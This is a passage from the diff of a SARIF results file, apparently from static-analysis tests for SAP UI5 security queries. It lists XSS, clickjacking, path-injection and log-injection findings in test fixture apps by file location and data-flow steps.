"region" : { + "startLine" : 34, + "startColumn" : 17, + "endColumn" : 30 + } + }, + "message" : { + "text" : "output3: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 315 + }, + "region" : { + "startLine" : 17, + "startColumn" : 5, + "endColumn" : 40 + } + }, + "message" : { + "text" : "content={/output3}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 311 + }, + "region" : { + "startLine" : 18, + "startColumn" : 31, + "endColumn" : 60 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 319 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 323 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : 
"user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "1406455ac263a2d9:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 12, + "startColumn" : 26, + "endColumn" : 46 + } + }, + "message" : { + "text" : "new JSONModel(oData)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" 
: { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 25, + "endColumn" : 53 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 15, + "startColumn" : 17, + "endColumn" : 53 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 16, + "startColumn" : 43, + "endColumn" : 48 + } + }, + "message" : { + "text" : "input" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 327 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 29 + } + }, + "message" : { + "text" : "output: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/output}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 331 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + 
"toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "97b29ed20ac04ff0:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 343 + }, + "region" : { + "startLine" : 8, + "startColumn" : 40, + "endColumn" : 63 + } + }, + "message" : { + "text" : "\"contro ... 
l.json\"" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endColumn" : 37 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 348 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "5edd24be658b61a4:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "data-value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 352 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 8, + "startColumn" : 11, + "endColumn" : 34 + } + }, + "message" : { + "text" : "data-content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-view/webapp/view/app.view.html", + "uriBaseId" : "%SRCROOT%", + "index" : 355 + }, + "region" : { + "startLine" : 5, + "startColumn" : 11, + "endColumn" : 32 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + 
}, { + "ruleId" : "js/ui5-xss", + "rule" : { + "id" : "js/ui5-xss", + "index" : 0, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "XSS vulnerability due to [user-provided value](1).\nXSS vulnerability due to [user-provided value](2)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6e0d8f690e30e24a:1", + "primaryLocationStartColumnFingerprint" : "0" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + }, { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : 
{ + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 22, + "startColumn" : 5, + "endColumn" : 38 + } + }, + "message" : { + "text" : "content={/input}" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 8, + "startColumn" : 5, + "endLine" : 10, + "endColumn" : 27 + } + }, + "message" : { + "text" : "user-provided value" + } + }, { + "id" : 2, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + }, + "region" : { + "startLine" : 15, + "startColumn" : 5, + "endLine" : 18, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + 
"text" : "Possible clickjacking vulnerability due to window\\[ ... onfig\"\\] being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 9, + "startColumn" : 9, + "endColumn" : 32 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "6152b8f74a1abdf5:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to data-sap-ui-frameOptions=allow being set to `allow`." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-allow-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 136 + }, + "region" : { + "startLine" : 28, + "startColumn" : 34, + "endColumn" : 66 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b01bd23ca3666824:1", + "primaryLocationStartColumnFingerprint" : "25" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Clickjacking/clickjacking-default-all/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 138 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "7fe81114896a63c:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-clickjacking", + "rule" : { + "id" : "js/ui5-clickjacking", + "index" : 1, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Possible clickjacking vulnerability due to missing frame options." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + }, + "region" : { + "startLine" : 2, + "endColumn" : 16 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "df700c15dad274b2:1", + "primaryLocationStartColumnFingerprint" : "0" + } + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "68e5ff83e2198ff5:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 214 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + "region" : { + "startLine" : 8, + "startColumn" : 23, + "endColumn" : 38 + } + }, + "message" : { + "text" : "{ type: \"int\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 216 + }, + 
"region" : { + "startLine" : 17, + "startColumn" : 43, + "endColumn" : 61 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 220 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "b79de9dff4d8f842:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + 
"index" : 228 + }, + "region" : { + "startLine" : 9, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 9, + "startColumn" : 23, + "endColumn" : 41 + } + }, + "message" : { + "text" : "{ type: \"string\" }" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 29, + "endColumn" : 47 + } + }, + "message" : { + "text" : "oControl.getText()" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 15, + "startColumn" : 21, + "endColumn" : 47 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 53, + "endColumn" : 58 + } + }, + "message" : { + "text" : "value" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 46, + "endColumn" : 59 + } + 
}, + "message" : { + "text" : "String(value)" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 36, + "endColumn" : 60 + } + }, + "message" : { + "text" : "encodeX ... value))" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 17, + "startColumn" : 21, + "endColumn" : 60 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 222 + }, + "region" : { + "startLine" : 23, + "startColumn" : 43, + "endColumn" : 55 + } + }, + "message" : { + "text" : "xssSanitized" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 227 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-path-injection", + "rule" : { + "id" : "js/ui5-path-injection", + "index" : 2, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "The path of a saved file depends on a [user-provided value](1)." 
+ }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "de27f6d546a116e8:1", + "primaryLocationStartColumnFingerprint" : "26" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : [ { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "value={/input}" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 10, + "startColumn" : 17, + "endColumn" : 28 + } + }, + "message" : { + "text" : "input: null" + } + } + }, { + "location" : { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 231 + }, + "region" : { + "startLine" : 16, + "startColumn" : 39, + "endColumn" : 67 + } + }, + "message" : { + "text" : "oModel. ... 
input')" + } + } + } ] + } ] + } ], + "relatedLocations" : [ { + "id" : 1, + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5PathInjection/path-html-control-df/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 235 + }, + "region" : { + "startLine" : 5, + "startColumn" : 5, + "endLine" : 7, + "endColumn" : 29 + } + }, + "message" : { + "text" : "user-provided value" + } + } ] + }, { + "ruleId" : "js/ui5-log-injection", + "rule" : { + "id" : "js/ui5-log-injection", + "index" : 3, + "toolComponent" : { + "index" : 2 + } + }, + "message" : { + "text" : "Log entry depends on a [user-provided value](1)." + }, + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + }, + "region" : { + "startLine" : 8, + "startColumn" : 26, + "endColumn" : 31 + } + } + } ], + "partialFingerprints" : { + "primaryLocationLineHash" : "62d5a4db56a18502:1", + "primaryLocationStartColumnFingerprint" : "21" + }, + "codeFlows" : [ { + "threadFlows" : [ { + "locations" : 